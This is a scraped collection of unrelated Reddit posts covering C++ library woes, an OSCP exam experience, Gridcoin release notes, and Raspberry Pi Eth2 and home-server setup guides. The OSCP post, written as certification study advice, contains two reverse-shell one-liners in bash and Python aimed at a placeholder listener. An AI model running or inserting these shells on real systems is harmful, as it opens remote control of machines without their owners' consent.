
Binarystation Official Site

A place to help anyone who has a uterus

This sub is dedicated to providing information and resources to those in need of services in states that have passed the heartbeat bill. Please read the info in the sidebar 💖
[link]

Why is it such an abysmal pain to use libraries in C++ compared to pretty much anything else?

I recently realized something that's been annoying me for so long

How to add a library in JavaScript:
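Typically a single command (the package name here is just a placeholder):

npm install some-library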

How to add a library in C#:
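Again one command, via the dotnet CLI (package name is a placeholder):

dotnet add package Some.Library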

How to add a library in Go:
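One command (module path is a placeholder):

go get github.com/some/library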

How to add a library in Rust (And this is so "C++ is compiled" isn't an excuse):
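One line in Cargo.toml (crate name and version are placeholders):

[dependencies]
some-library = "1.0"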

If you install cargo-edit you can alternatively just:
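cargo add some-library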

How to add a library in C++:
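Roughly the following, assuming the library even ships a CMake build (every step here is just one of many possible variants):

# find the library's website and download a release
git clone https://example.com/some/library.git
cd library && mkdir build && cd build
cmake .. && make && sudo make install
# then teach your own build system where to find it:
# edit your CMakeLists.txt, add find_package()/include paths/linker flags,
# and hope the installed binary is ABI-compatible with your compiler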

submitted by scarletkrath to cpp [link] [comments]

Passed OSCP - My Experience

Originally, I was leaning against doing an obligatory post-OSCP Reddit post because I didn’t want to come across as another “look at me - I passed OSCP!!” cringeworthy OSCP Oscar speech, but I decided to go ahead and do one because my experience was perhaps a little unique and answers the much-asked question “can I do OSCP without experience?”.
A quick background to add context…
I’m 31 years old and my employment history is a mixture of sales, graphics, and media-related job roles. I felt discontented for a long time earning (barely) a living wage in job roles I had little passion for. Anyway, to cut a long story short, I decided to quit my latest sales job in November last year (2019) to pursue a career in cybersecurity/infosec. I didn’t know what ‘TCP’ or ‘UDP’ was, and I’d never heard of ‘Kali’ or how to run a VM, but I was convinced that this would be the career path for me.
Anyway, I went through Security+ and C|EH from November to March and, just as I was going to start applying for Security Analyst type job roles, our friendly neighbourhood Coronavirus came along and shut down the economy. Even though I had no intention of doing OSCP for another year or two, I thought it was a better option than twiddling my thumbs for a few months, so I decided to sign up for PWK labs and have a crack at it.
Fast-forwarding to yesterday, after a few brutal months and an incredible experience, I finally got the OSCP “you have successfully completed” email.
Apologies in advance for the essay but I just want to go through my journey for those of you that might be in a similar position to the one I was in - limited/zero IT experience and feeling intimidated by the dreaded OSCP mountain.
My journey…
In the weeks leading up to the start of my 60 days of PWK material and labs, I went through The Cyber Mentor’s Practical Ethical Hacking Udemy course and then went on a Hack the Box rampage, so, by the time my lab time started, I felt like I was in a pretty decent position.
Unfortunately, because I was a naïve idiot, I tackled the labs straight away and went through the PWK PDF casually on the side. This was a big mistake and something I would definitely change in hindsight because it cost me 5 easy points on the exam (I thought I could smash through the PDF exercises during the last week of labs but this didn’t prove to be enough time).
In 60 days I ended up rooting around 40 machines - I didn’t bother going for the networks because it didn’t apply to the exam and, although valuable real-world experience, I didn’t want to get distracted and flood my brain with even more information when it wasn’t going to be relevant for my mission.
One big thing that I did get right was note-taking. I can’t express enough how valuable it is to take detailed notes and build your own cheat sheet library. After every machine I rooted, I did a walkthrough on OneNote and added any new tools/commands to my cheat sheet library. This not only saves precious time in the exam, but it helps you build your own knowledge instead of relying on other people’s cheat sheets without really understanding what you’re doing.
After my 60 days had finished, I spent 1 month on TJ Null’s OSCP Hack the Box list and IppSec’s video walkthroughs. I also can’t stress enough how valuable this learning methodology is. My only regret is that I rushed through it. I’d already booked my exam 30 days after lab time, so I ended up jumping through walkthroughs when I got stuck on boxes instead of exhausting all options. This was another naïve idiot mistake on my behalf and something I would do differently in hindsight. There’s a difference between “trying harder” and “trying harder, but in a smart way”. I was putting 10+ hours in every day but I wasn’t always being efficient with my time. I’d definitely recommend seeking hints and tips on boxes but only after you’ve exhausted all options first, something which I didn’t always do.
Anyway, my first exam attempt came around towards the end of July. Was I ready? No, but I had delusional confidence in myself that has paid off for me more often than not, so I was hoping it would pay off for me again.
My first exam was brutal. I sat in my chair for a total of 23 hours and 15 minutes, with only 3 short 5-minute breaks to get food to snack on. My VPN was shut down after 24 hours and I had a total of 65 points, which I’d been stuck on for the last 8 hours of my exam. I got the BO, root on one of the 20-point machines, root on the 10-point machine, and user on the other 20-point machine. I just couldn’t get root on that last machine.
I was pretty devastated because I’d put my heart and soul into Sec+, C|EH, and OSCP for 7 straight months and I wanted it bad. But my delusional confidence wasn’t enough.
After listening to depressing Taylor Swift songs for a few days (joke), I decided to book another exam in, 4 weeks after my first attempt.
This time around, I decided to go through Tib3rius’s Linux and Windows Privilege Escalation courses (they were great) and go back over some of the HTB machines. I honestly felt at this point that there wasn’t much more study material that I could go through.
2nd exam came up and it was an almost minute-for-minute repeat of the first exam. BO done, 20 point rooted, 10 point rooted, but could only get user on the other 20 point. 65 points again. This time I ended up listening to Taylor Swift + Lana Del Rey.
I was pretty adamant that I could do this and that I was very close, so I sent Off-Sec an email explaining my situation and they were kind enough to allow me another exam attempt without waiting 8 weeks - I booked another exam in 2 weeks after my second attempt.
This time, my preparation was entirely mental. In both my prior exams, I was sat on my chair for over 23 hours because I was flapping around aimlessly like a headless chicken, desperately firing off exploits that I knew wouldn’t work on the other 20-point machine. So, I went into the 3rd exam determined to go at a slow and steady pace, and not let the 24-hour timeframe pressure me into a wild goose chase.
Miraculously, it seemed to work. After 14 hours, I’d done the BO, rooted both 20-point machines, rooted the 10-point machine, and got user on the 25-point machine. 85-ish points in total.
The point of this story is to get across to people that you need to try simpler, not harder. I perhaps failed my first exam because I hadn’t gone through Tib3rius’s Priv Esc courses, but my 2nd failure was 100% down to mentality. There was no skill-level difference between my 2nd exam and my 3rd exam.
I’ll finish off with my recommended learning methodology and exam tips (for people with limited/zero IT experience):
. The Cyber Mentor Practical Ethical Hacking Udemy course (usually on offer at $14.99-ish)
. Tib3rius’s Linux and Windows Privilege Escalation course (usually on offer at $12.99 each)
. Try Hack Me OSCP Learning Path (I would recommend doing this before HTB - it is $10 for 30 days)
. PWK labs (I personally don’t feel more than 60 days are required - unless you work full-time)
. TJ Null’s OSCP Hack the Box list ($10 for retired HTB machines - very worth it)
. You should be ready for the exam
Exam tips:
. Become proficient with Nmap but use an enumeration tool like nmapAutomator for the exam
. You will need to understand what bash and Python scripts are doing (you don’t need to be able to write them from scratch)
. Don’t be tempted to use a fancy BO methodology for the exam, stick with PWK’s methodology - it works (some of the others don’t)
. Play around with various reverse shell payloads - sometimes a bash one-liner won’t work so you need to go with Python. Sometimes Bash, Python, and netcat won’t work, so you need to understand what alternatives you can use in that scenario (see the one-liners after this list)
. Get into the habit of reading service manuals. In all 3 of my exams, I came up against machines that had services I’d never even heard of. Fortunately, I’d got into the habit of reading service manuals; otherwise, I would have skipped over the services and got lost down a rabbit hole
. Get into the habit of exploiting conventional services in unconventional ways. Just because an SUID binary isn’t on Gtfobins, it doesn’t mean that you can’t exploit the SUID binary in an unconventional way. Again, get into the habit of reading manuals to understand what services do
. Become familiar with Burp Suite. Many exploits won’t work in the way you might expect them to, but they will work if you run them through Burp. Or, at the very least, you’ll be able to understand why they’re not working. This issue came up in my last exam and I would have been completely lost if it weren’t for Burp
. Take breaks if you get frustrated - this is said over and over again by people on this subreddit and it’s an absolute must. The 20 point machine that I couldn’t root after 8 hours on my 2nd exam showed up again on my 3rd exam (thanks Off-Sec - I know you tried to fu*k me with that), but this time I was able to root it within 1 hour, simply because my mindset was different.
. Trust your gut - by doing PWK and HTB machines, you should develop a gut feeling of when you are in a rabbit hole and when you’re on the right track. I ended up rooting over 100 machines before the exam (albeit with plenty of hints and tips) and it helped me develop a good gut feeling. I can’t explain why but there were times in my last exam where I knew I was in the right area even though I wasn’t able to enumerate the specific service version. This feeling simply came from experience. I’m sure many of you watch IppSec’s videos and wonder “how the hell does he know to do X or Y?”. I used to wonder this all the time but after going through dozens of machines, I finally got it. It comes down to experience. Try to do as many machines as you can before the exam to build that gut feeling, and trust it in the exam.
. Embrace failure - this is perhaps the most important thing that I can say. OSCP is a difficult journey and many people fail multiple times before passing. And you know what? That’s okay. It’s okay to fail. It’s how you react to failure that counts. I’m not particularly smart but I embrace failure and I know deep down that I will keep trying until I pass. I was prepared to take the OSCP exam 1000 times if I had to, I was never going to let the exam beat me. I suggest you approach it with the same mentality and not let silly pride prevent you from having a go at it.
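For reference on the reverse shell tip above, these are the kinds of classic one-liners I mean (the IP and port are placeholders for your own listener):

bash -i >& /dev/tcp/10.10.10.10/4444 0>&1
python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("10.10.10.10",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];subprocess.call(["/bin/sh","-i"])'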
One last thing! Join a solid Discord community. This journey has been amazing since day one and a big reason behind that is the amazing online community. I was very active in an HTB community and ended up talking to several people who were going through OSCP at the same time as me. This was honestly such a massive help to me because I didn’t know what the hell I was doing when I first started!
Sorry for the massive rant - I just see so many people on here treating OSCP like an insurmountable mountain. It’s not. You can do it!
submitted by TheCrypt0nian to oscp [link] [comments]

Go bindings to QuickJS: a fast, small, and embeddable ES2020 JavaScript interpreter.

submitted by lithdew to golang [link] [comments]

Gridcoin 5.0.0.0-Mandatory "Fern" Release

https://github.com/gridcoin-community/Gridcoin-Research/releases/tag/5.0.0.0
Finally! After over ten months of development and testing, "Fern" has arrived! This is a whopper. 240 pull requests merged. Essentially a complete rewrite that was started with the scraper (the "neural net" rewrite) in "Denise" has now been completed. Practically the ENTIRE Gridcoin-specific codebase resting on top of the vanilla Bitcoin/Peercoin/Blackcoin PoS code has been rewritten. This removes the team requirement at last (see below), although there are many other important improvements besides that.
Fern was a monumental undertaking. We had to encode all of the old rules active for the v10 block protocol in new code and ensure that the new code was 100% compatible. This had to be done in such a way as to clear out all of the old spaghetti and ring-fence it with tightly controlled class implementations. We then wrote an entirely new, simplified ruleset for research rewards and reengineered contracts (which includes beacon management, polls, and voting) using properly classed code. The fundamentals of Gridcoin with this release are now on a very sound and maintainable footing, and the developers believe the codebase as updated here will serve as the fundamental basis for Gridcoin's future roadmap.
We have been testing this for MONTHS on testnet in various stages. The v10 (legacy) compatibility code has been running on testnet continuously as it was developed to ensure compatibility with existing nodes. During the last few months, we have done two private testnet forks and then the full public testnet testing for v11 code (the new protocol which is what Fern implements). The developers have also been running non-staking "sentinel" nodes on mainnet with this code to verify that the consensus rules are problem-free for the legacy compatibility code on the broader mainnet. We believe this amount of testing is going to result in a smooth rollout.
Given the amount of changes in Fern, I am presenting TWO changelogs below. One is high level, which summarizes the most significant changes in the protocol. The second changelog is the detailed one in the usual format, and gives you an inkling of the size of this release.

Highlights

Protocol

Note that the protocol changes will not become active until we cross the hard-fork transition height to v11, which has been set at 2053000. Given current average block spacing, this should happen around October 4, about one month from now.
Note that to get all of the beacons in the network on the new protocol, we are requiring ALL beacons to be validated. A two week (14 day) grace period is provided by the code, starting at the time of the transition height, for people currently holding a beacon to validate the beacon and prevent it from expiring. That means that EVERY CRUNCHER must advertise and validate their beacon AFTER the v11 transition (around Oct 4th) and BEFORE October 18th (or more precisely, 14 days from the actual date of the v11 transition). If you do not advertise and validate your beacon by this time, your beacon will expire and you will stop earning research rewards until you advertise and validate a new beacon. This process has been made much easier by a brand new beacon "wizard" that helps manage beacon advertisements and renewals.

Once a beacon has been validated and is a v11 protocol beacon, the normal 180 day expiration rules apply. Note, however, that the 180 day expiration on research rewards has been removed with the Fern update. This means that while your beacon might expire after 180 days, your earned research rewards will be retained and can be claimed by advertising a beacon with the same CPID and going through the validation process again. In other words, you do not lose any earned research rewards if you do not stake a block within 180 days or fail to keep your beacon up-to-date.
The transition height is also when the team requirement will be relaxed for the network.

GUI

Besides the beacon wizard, there are a number of improvements to the GUI, including new UI transaction types (and icons) for staking the superblock, sidestake sends, beacon advertisement, voting, poll creation, and transactions with a message. The main screen has been revamped with a better summary section, and better status icons. Several changes under the hood have improved GUI performance. And finally, the diagnostics have been revamped.

Blockchain

The wallet sync speed has been DRASTICALLY improved. A decent machine with a good network connection should be able to sync the entire mainnet blockchain in less than 4 hours. A fast machine with a really fast network connection and a good SSD can do it in about 2.5 hours. One of our goals was to reduce or eliminate the reliance on snapshots for mainnet, and I think we have accomplished that goal with the new sync speed. We have also streamlined the in-memory structures for the blockchain which shaves some memory use.
There are so many goodies here it is hard to summarize them all.
I would like to thank all of the contributors to this release, but especially thank @cyrossignol, whose incredible contributions formed the backbone of this release. I would also like to pay special thanks to @barton2526, @caraka, and @Quezacoatl1, who tirelessly helped during the testing and polishing phase on testnet with testing and repeated builds for all architectures.
The developers are proud to present this release to the community and we believe this represents the starting point for a true renaissance for Gridcoin!

Summary Changelog

Accrual

Changed

Most significantly, nodes calculate research rewards directly from the magnitudes in EACH superblock between stakes instead of using a two- or three-point average based on a CPID's current magnitude and the magnitude for the CPID when it last staked. For those long-timers in the community, this has been referred to as "Superblock Windows," and was first done in proof-of-concept form by @denravonska.

Removed

Beacons

Added

Changed

Removed

Unaltered

As a reminder:

Superblocks

Added

Changed

Removed

Voting

Added

Changed

Removed

Detailed Changelog

[5.0.0.0] 2020-09-03, mandatory, "Fern"

Added

Changed

Removed

Fixed

submitted by jamescowens to gridcoin [link] [comments]

Ethereum on ARM. New Eth2.0 Raspberry Pi 4 image for joining the Medalla multi-client testnet. Step-by-step guide for installing and activating a validator (Prysm, Teku, Lighthouse and Nimbus clients included)

TL;DR: Flash your Raspberry Pi 4, plug in an ethernet cable, connect the SSD disk and power up the device to join the Eth2.0 medalla testnet.
The image takes care of all the necessary steps to join the Eth2.0 Medalla multi-client testnet [1], from setting up the environment and formatting the SSD disk to installing, managing and running the Eth1.0 and Eth2.0 clients.
You will only need to choose an Eth2.0 client, start the beacon chain service and activate / run the validator.
Note: this is an update for our previous Raspberry Pi 4 Eth2 image [2] so some of the instructions are directly taken from there.

MAIN FEATURES

SOFTWARE INCLUDED

INSTALLATION GUIDE AND USAGE

RECOMMENDED HARDWARE AND SETUP
STORAGE
You will need an SSD to run the Ethereum clients (without an SSD drive there’s absolutely no chance of syncing the Ethereum blockchain). There are 2 options:
Use a USB portable SSD such as the Samsung T5 Portable SSD.
Use a USB 3.0 external hard drive case with an SSD disk. In our case we used an Inateck 2.5 Hard Drive Enclosure FE2011. Make sure to buy a case with a UASP-compliant chip, particularly one of these: JMicron (JMS567 or JMS578) or ASMedia (ASM1153E).
In both cases, avoid getting low-quality SSD disks, as the disk is a key component of your node and it can drastically affect the performance (and sync times). Keep in mind that you need to plug the disk into a USB 3.0 port (in blue).
IMAGE DOWNLOAD AND INSTALLATION
1.- Download the image:
http://www.ethraspbian.com/downloads/ubuntu-20.04.1-preinstalled-server-arm64+raspi-eth2-medalla.img.zip
SHA256 149cb9b020d1c49fcf75c00449c74c6f38364df1700534b5e87f970080597d87
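You can verify the integrity of the download against this hash before flashing:

sha256sum ubuntu-20.04.1-preinstalled-server-arm64+raspi-eth2-medalla.img.zip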
2.- Flash the image
Insert the microSD in your Desktop / Laptop and download the file.
Note: If you are not comfortable with command line or if you are running Windows, you can use Etcher [10]
Open a terminal and check your MicroSD device name running:
sudo fdisk -l
You should see a device named mmcblk0 or sdd. Unzip and flash the image:
unzip ubuntu-20.04.1-preinstalled-server-arm64+raspi-eth2-medalla.img.zip
sudo dd bs=1M if=ubuntu-20.04.1-preinstalled-server-arm64+raspi-eth2-medalla.img of=/dev/mmcblk0 conv=fdatasync status=progress
3.- Insert the MicroSD into the Raspberry Pi 4. Connect an Ethernet cable and attach the USB SSD disk (make sure you are using a blue port).
4.- Power on the device
The Ubuntu OS will boot up in less than one minute but you will need to wait approximately 7-8 minutes in order to allow the script to perform the necessary tasks to install the Medalla setup (it will reboot again)
5.- Log in
You can log in through SSH or using the console (if you have a monitor and keyboard attached)
User: ethereum
Password: ethereum
You will be prompted to change the password on first login, so you will need to log in twice.
6.- Forward 30303 port in your router (both UDP and TCP). If you don’t know how to do this, google “port forwarding” followed by your router model. You will need to open additional ports as well depending on the Eth2.0 client you’ve chosen.
7.- Getting console output
You can see what’s happening in the background by typing:
sudo tail -f /var/log/syslog
8.- Grafana Dashboards
There are 5 Grafana dashboards available to monitor the Medalla node (see section “Grafana Dashboards” below).

The Medalla Eth2.0 multi-client testnet

Medalla is the official Eth2.0 multi-client testnet according to the latest official specification for Eth2.0, the v0.12.2 [11] release (which is intended to be the final one) [12].
In order to run a Medalla Eth 2.0 node you will need 3 components:
The image takes care of the Eth1.0 setup. So, once flashed (and after a first reboot), Geth (Eth1.0 client) starts to sync the Goerli testnet.
Follow these steps to enable your Eth2.0 Ethereum node:
CREATE THE VALIDATOR KEYS AND MAKE THE DEPOSIT
We need to get 32 Goerli ETH (fake ETH) in order to make the deposit in the Eth2.0 contract and run the validator. The easiest way of getting ETH is by joining Prysm's Discord channel.
Open Metamask [14], select the Goerli Network (top of the window) and copy your ETH Address. Go to:
https://discord.com/invite/YMVYzv6
And open the “request-goerli-eth” channel (on the left)
Type:
!send $YOUR_ETH_ADDRESS (replace it with the one copied on Metamask)
You will receive enough ETH to run 1 validator.
Now it is time to create your validator keys and the deposit information. For your convenience we’ve packaged the official Eth2 launchpad tool [4]. Go to the EF Eth2.0 launchpad site:
https://medalla.launchpad.ethereum.org/
And click “Get started”
Read and accept all warnings. In the next screen, select 1 validator and go to your Raspberry Pi console. Under the ethereum account run:
cd && deposit --num_validators 1 --chain medalla
Choose your mnemonic language and type a password for keeping your keys safe. Write down your mnemonic, press any key and type it again as requested.
Now you have 2 JSON files under the validator_keys directory. A deposit data file for sending the 32 ETH along with your validator public key to the Eth1 chain (goerli testnet) and a keystore file with your validator keys.
Back to the Launchpad website, check "I am keeping my keys safe and have written down my mnemonic phrase" and click "Continue".
It is time to send the 32 ETH deposit to the Eth1 chain. You need the deposit file (located in your Raspberry Pi). You can either copy and paste the file content and save it as a new file on your desktop, or copy the file from the Raspberry to your desktop through SSH.
1.- Copy and paste: Connected through SSH to your Raspberry Pi, type:
cat validator_keys/deposit_data-$FILE-ID.json (replace $FILE-ID with yours)
Copy the content (the text in square brackets), go back to your desktop, paste it into your favourite editor and save it as a json file.
Or
2.- Ssh: From your desktop, copy the file:
scp ethereum@$YOUR_RASPBERRYPI_IP:/home/ethereum/validator_keys/deposit_data-$FILE_ID.json /tmp
Replace the variables with your data. This will copy the file to your desktop /tmp directory.
Upload the deposit file
Now, back to the Launchpad website, upload the deposit_data file and select Metamask, click continue and check all warnings. Continue and click “Initiate the Transaction”. Confirm the transaction in Metamask and wait for the confirmation (a notification will pop up shortly).
The Beacon Chain (which is connected to the Eth1 chain) will detect this deposit (that includes the validator public key) and the Validator will be enabled.
Congrats! You just started your validator activation process.
CHOOSE AN ETH2.0 CLIENT
Time to choose your Eth2.0 client. We encourage you to run Lighthouse, Teku or Nimbus as Prysm is the most used client by far and diversity is key to achieve a resilient and healthy Eth2.0 network.
Once you have decided which client to run (as said, try to run one with low network usage), you need to set up the client and start both the beacon chain and the validator.
These are the instructions for enabling each client (Remember, choose just one Eth2.0 client out of 4):
LIGHTHOUSE ETH2.0 CLIENT
1.- Port forwarding
You need to open the 9000 port in your router (both UDP and TCP)
2.- Start the beacon chain
Under the ethereum account, run:
sudo systemctl enable lighthouse-beacon
sudo systemctl start lighthouse-beacon
3.- Start the validator
We need to import the validator keys. Run under the ethereum account:
lighthouse account validator import --directory=/home/ethereum/validator_keys
Then, type your previously defined password and run:
sudo systemctl enable lighthouse-validator
sudo systemctl start lighthouse-validator
The Lighthouse beacon chain and validator are now enabled
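If you want to confirm that both services came up correctly, the standard systemd commands work here, e.g.:

sudo systemctl status lighthouse-beacon
sudo journalctl -u lighthouse-validator -f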

PRYSM ETH2.0 CLIENT
1.- Port forwarding
You need to open the 13000 and 12000 ports in your router (both UDP and TCP)
2.- Start the beacon chain
Under the ethereum account, run:
sudo systemctl enable prysm-beacon
sudo systemctl start prysm-beacon
3.- Start the validator
We need to import the validator keys. Run under the ethereum account:
validator accounts-v2 import --keys-dir=/home/ethereum/validator_keys
Accept the default wallet path and enter a password for your wallet. Now enter the password previously defined.
Lastly, set up your password and start the client:
echo "$YOUR_PASSWORD" > /home/ethereum/validator_keys/prysm-password.txt
sudo systemctl enable prysm-validator
sudo systemctl start prysm-validator
The Prysm beacon chain and the validator are now enabled.

TEKU ETH2.0 CLIENT
1.- Port forwarding
You need to open the 9151 port (both UDP and TCP)
2.- Start the Beacon Chain and the Validator
Under the Ethereum account, check the name of your keystore file:
ls /home/ethereum/validator_keys/keystore*
Set the keystore file name in the teku config file (replace the $KEYSTORE_FILE variable with the file listed above)
sudo sed -i 's/changeme/$KEYSTORE_FILE/' /etc/ethereum/teku.conf
Set the password previously entered:
echo "yourpassword" > validator_keys/teku-password.txt
Start the beacon chain and the validator:
sudo systemctl enable teku
sudo systemctl start teku
The Teku beacon chain and validator are now enabled.

NIMBUS ETH2.0 CLIENT
1.- Port forwarding
You need to open the 19000 port (both UDP and TCP)
2.- Start the Beacon Chain and the Validator
We need to import the validator keys. Run under the ethereum account:
beacon_node deposits import /home/ethereum/validator_keys --data-dir=/home/ethereum/.nimbus --log-file=/home/ethereum/.nimbus/nimbus.log
Enter the password previously defined and run:
sudo systemctl enable nimbus
sudo systemctl start nimbus
The Nimbus beacon chain and validator are now enabled.

WHAT's NEXT
Now you need to wait for the Eth1 blockchain and the beacon chain to get synced. In a few hours the validator will get enabled and put into a queue. These are the validator statuses that you will see until its final activation:
Finally, it will get activated and the staking process will start.
Congratulations! You've joined the Medalla Eth2.0 multi-client testnet!

Grafana Dashboards

We configured 5 Grafana Dashboards to let users monitor both Eth1.0 and Eth2.0 clients. To access the dashboards just open your browser and type your Raspberry IP followed by the 3000 port:
http://replace_with_your_IP:3000
user: admin
passwd: ethereum
There are 5 dashboards available:
Lots of info here. You can see for example if Geth is in sync by checking (in the Blockchain section) if Headers, Receipts and Blocks fields are aligned or find Eth2.0 chain info.

Updating the software

We will be keeping the Eth2.0 clients updated through Debian packages in order to keep up with the testnet progress. Basically, you need to update the repo and install the packages through the apt command. For instance, in order to update all packages you would run:
sudo apt-get update && sudo apt-get install geth teku nimbus prysm-beacon prysm-validator lighthouse-beacon lighthouse-validator
Please follow us on Twitter in order to get regular updates and install instructions.
https://twitter.com/EthereumOnARM

References

  1. https://github.com/goerli/medalla/tree/master/medalla
  2. https://www.reddit.com/r/ethereum/comments/hhvi2r/ethereum_on_arm_new_eth20_raspberry_pi_4_image/
  3. https://github.com/ethereum/go-ethereum/releases/tag/v1.9.20
  4. https://github.com/ethereum/eth2.0-deposit-cli/releases
  5. https://github.com/prysmaticlabs/prysm/releases/tag/v1.0.0-alpha.23
  6. https://github.com/PegaSysEng/teku
  7. https://github.com/sigp/lighthouse/releases/tag/v0.2.8
  8. https://github.com/status-im/nim-beacon-chain
  9. https://grafana.com
  10. https://www.balena.io/etcher
  11. https://github.com/ethereum/eth2.0-specs/releases/tag/v0.12.2
  12. https://blog.ethereum.org/2020/08/03/eth2-quick-update-no-14
  13. https://goerli.net
  14. https://metamask.io
submitted by diglos76 to ethereum [link] [comments]

NASPi: a Raspberry Pi Server

In this guide I will cover how to set up a functional server providing: mailserver, webserver, file sharing server, backup server, monitoring.
For this project a dynamic domain name is also needed. If you don't want to spend money registering a domain name, you can use services like dynu.com or duckdns.org. Between the two, I prefer dynu.com, because you can set every type of DNS record (TXT records are only available after 30 days, but that's a fair trade-off for not spending ~15€/year on a domain name), which the mailserver specifically needs.
Also, I highly suggest you read the documentation of the software used, since I cannot cover every feature.

Hardware


Software

(minor utilities not included)

Guide

First things first, we need to flash the OS to the SD card. The Raspberry Pi imager utility is very useful and simple to use, and supports any type of OS. You can download it from the Raspberry Pi download page. As of August 2020, the 64-bit version of Raspberry Pi OS is still in the beta stage, so I am going to cover the 32-bit version (but with a 64-bit kernel, we'll get to that later).
Before moving on and powering on the Raspberry Pi, add a file named ssh in the boot partition. Doing so will enable the SSH interface (disabled by default). We can now insert the SD card into the Raspberry Pi.
Once powered on, we need to attach it to the LAN, via an Ethernet cable. Once done, find the IP address of your Raspberry Pi within your LAN. From another computer we will then be able to SSH into our server, with the user pi and the default password raspberry.
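For example (replace the IP with the one you found; this address is just an illustration):

$ ssh pi@192.168.0.5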

raspi-config

Using this utility, we will set a few things. First of all, set a new password for the pi user, using the first entry. Then move on to changing the hostname of your server, with the network entry (for this tutorial we are going to use naspi). Set the locale, the time-zone, the keyboard layout and the WLAN country using the fourth entry. At last, enable SSH by default with the fifth entry.

64-bit kernel

As previously stated, we are going to take advantage of the 64-bit processor the Raspberry Pi 4 has, even with a 32-bit OS. First, we need to update the firmware, then we will tweak some config.
$ sudo rpi-update
$ sudo nano /boot/config.txt
arm_64bit=1 
$ sudo reboot

swap size

With my 2 GB version I encountered many RAM problems, so I had to increase the swap space to mitigate the damages caused by the OOM killer.
$ sudo dphys-swapfile swapoff
$ sudo nano /etc/dphys-swapfile
CONF_SWAPSIZE=1024 
$ sudo dphys-swapfile setup
$ sudo dphys-swapfile swapon
Here we are increasing the swap size to 1 GB. According to your setup you can tweak this setting to add or remove swap. Just remember that every time you modify this parameter, you'll empty the partition, moving every bit from swap to RAM, eventually calling in the OOM killer.

APT

In order to reduce resource usage, we'll set APT to avoid installing recommended and suggested packages.
$ sudo nano /etc/apt/apt.conf.d/01norecommend
APT::Install-Recommends "0"; APT::Install-Suggests "0"; 

Update

Before starting installing packages we'll take a moment to update every already installed component.
$ sudo apt update
$ sudo apt full-upgrade
$ sudo apt autoremove
$ sudo apt autoclean
$ sudo reboot

Static IP address

For simplicity sake we'll give a static IP address for our server (within our LAN of course). You can set it using your router configuration page or set it directly on the Raspberry Pi.
$ sudo nano /etc/dhcpcd.conf
interface eth0
static ip_address=192.168.0.5/24
static routers=192.168.0.1
static domain_name_servers=192.168.0.1
$ sudo reboot

Emailing

The first feature we'll set up is the mailserver. This is because the iRedMail script works best on a fresh installation, as recommended by its developers.
First we'll set the hostname to our domain name. Since my domain is naspi.webredirect.org, the domain name will be mail.naspi.webredirect.org.
$ sudo hostnamectl set-hostname mail.naspi.webredirect.org
$ sudo nano /etc/hosts
127.0.0.1 mail.naspi.webredirect.org localhost
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
127.0.1.1 naspi
Now we can download and setup iRedMail
$ sudo apt install git
$ cd /home/pi/Documents
$ sudo git clone https://github.com/iredmail/iRedMail.git
$ cd /home/pi/Documents/iRedMail
$ sudo chmod +x iRedMail.sh
$ sudo bash iRedMail.sh
Now the script will guide you through the installation process.
When asked for the mail directory location, set /var/vmail.
When asked for webserver, set Nginx.
When asked for DB engine, set MariaDB.
When asked for, set a secure and strong password.
When asked for the domain name, set yours, but without the mail. subdomain.
Again, set a secure and strong password.
In the next step select Roundcube, iRedAdmin and Fail2Ban, but not netdata, as we will install it in the next step.
When asked for, confirm your choices and let the installer do the rest.
$ sudo reboot
Once the installation is over, we can move on to installing the SSL certificates.
$ sudo apt install certbot
$ sudo certbot certonly --webroot --agree-tos --email youremail@something.com -d mail.naspi.webredirect.org -w /var/www/html/
$ sudo nano /etc/nginx/templates/ssl.tmpl
ssl_certificate /etc/letsencrypt/live/mail.naspi.webredirect.org/fullchain.pem;
ssl_certificate_key /etc/letsencrypt/live/mail.naspi.webredirect.org/privkey.pem;
$ sudo service nginx restart
$ sudo nano /etc/postfix/main.cf
smtpd_tls_key_file = /etc/letsencrypt/live/mail.naspi.webredirect.org/privkey.pem
smtpd_tls_cert_file = /etc/letsencrypt/live/mail.naspi.webredirect.org/cert.pem
smtpd_tls_CAfile = /etc/letsencrypt/live/mail.naspi.webredirect.org/chain.pem
$ sudo service postfix restart
$ sudo nano /etc/dovecot/dovecot.conf
ssl_cert = </etc/letsencrypt/live/mail.naspi.webredirect.org/fullchain.pem
ssl_key = </etc/letsencrypt/live/mail.naspi.webredirect.org/privkey.pem
$ sudo service dovecot restart
Now we have to tweak some Nginx settings in order to not interfere with other services.
$ sudo nano /etc/nginx/sites-available/90-mail
server {
    listen 443 ssl http2;
    server_name mail.naspi.webredirect.org;
    root /var/www/html;
    index index.php index.html;
    include /etc/nginx/templates/misc.tmpl;
    include /etc/nginx/templates/ssl.tmpl;
    include /etc/nginx/templates/iredadmin.tmpl;
    include /etc/nginx/templates/roundcube.tmpl;
    include /etc/nginx/templates/sogo.tmpl;
    include /etc/nginx/templates/netdata.tmpl;
    include /etc/nginx/templates/php-catchall.tmpl;
    include /etc/nginx/templates/stub_status.tmpl;
}
server {
    listen 80;
    server_name mail.naspi.webredirect.org;
    return 301 https://$host$request_uri;
}
$ sudo ln -s /etc/nginx/sites-available/90-mail /etc/nginx/sites-enabled/90-mail
$ sudo rm /etc/nginx/sites-*/00-default*
$ sudo nano /etc/nginx/nginx.conf
user www-data;
worker_processes 1;
pid /var/run/nginx.pid;
events {
    worker_connections 1024;
}
http {
    server_names_hash_bucket_size 64;
    include /etc/nginx/conf.d/*.conf;
    include /etc/nginx/conf-enabled/*.conf;
    include /etc/nginx/sites-enabled/*;
}
$ sudo service nginx restart

.local domain

If you want to reach your server easily within your network you can set the .local domain to it. To do so you simply need to install a service and tweak the firewall settings.
$ sudo apt install avahi-daemon
$ sudo nano /etc/nftables.conf
# avahi
udp dport 5353 accept
$ sudo service nftables restart
When editing the nftables configuration file, add the above lines just below the other specified ports, within the chain input block. This is needed because avahi communicates via the 5353 UDP port.

RAID 1

At this point we can start setting up the disks. I highly recommend you to use two or more disks in a RAID array, to prevent data loss in case of a disk failure.
We will use mdadm, and suppose that our disks will be named /dev/sda1 and /dev/sdb1. To find out the names issue the sudo fdisk -l command.
$ sudo apt install mdadm
$ sudo mdadm --create -v /dev/md/RED -l 1 --raid-devices=2 /dev/sda1 /dev/sdb1
$ sudo mdadm --detail /dev/md/RED
$ sudo -i
$ mdadm --detail --scan >> /etc/mdadm/mdadm.conf
$ exit
